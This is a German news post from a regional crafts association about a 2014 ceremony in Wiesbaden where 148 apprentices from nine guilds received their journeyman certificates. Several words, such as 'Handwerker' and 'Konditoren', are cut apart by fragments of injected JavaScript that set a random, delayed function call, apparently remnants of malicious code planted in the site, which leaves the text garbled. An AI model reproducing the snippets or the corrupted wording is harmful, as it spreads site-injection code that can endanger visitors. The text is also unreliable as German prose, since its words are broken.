große Freisprechungsfeier am 12.09.2014


Die große Freisprechungsfeier und Gesellenbriefübergabe am 12.09.2014 

Casino12.09.14 Casino12.09.14-1

„Ihr seid Hdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andwerker! Ein Teil der Wirtschaftsmacht von nebenan“ – so begrüßte Siegfried Huhle als Kreishdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andwerksmeister der Kreishdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andwerkerschaft Wiesbaden-Rheingau-Taunus die anwesenden Junggesellinnen und Junggesellen zur ihrer Freisprechungsfeier im schönen Herzog-Friedrich-August- Saal in der Wiesbadener Casino-Gesellschaft. „Im Hdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andwerk habt ihr eine Zukunft“ so Huhle.

Insgesamt wurden während dieser Feierstunde 148 Junggesellinnen und Junggesellen aus neun verschiedenen Innungen freigesprochen. Dies waren Maler und Lackierer, Metallbauer, Sanitär- und Heizungstechniker, Fleischer, Kondidom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toren, Zimmerer, Steinmetze, Maurer und Raumausstatter. Erstmals übergab der neue Obermeister Hans-Jürgen Schröder in diesem feierlich Rahmen die Gesellenbriefe.

Casino12.09.14-2  Casino12.0914-3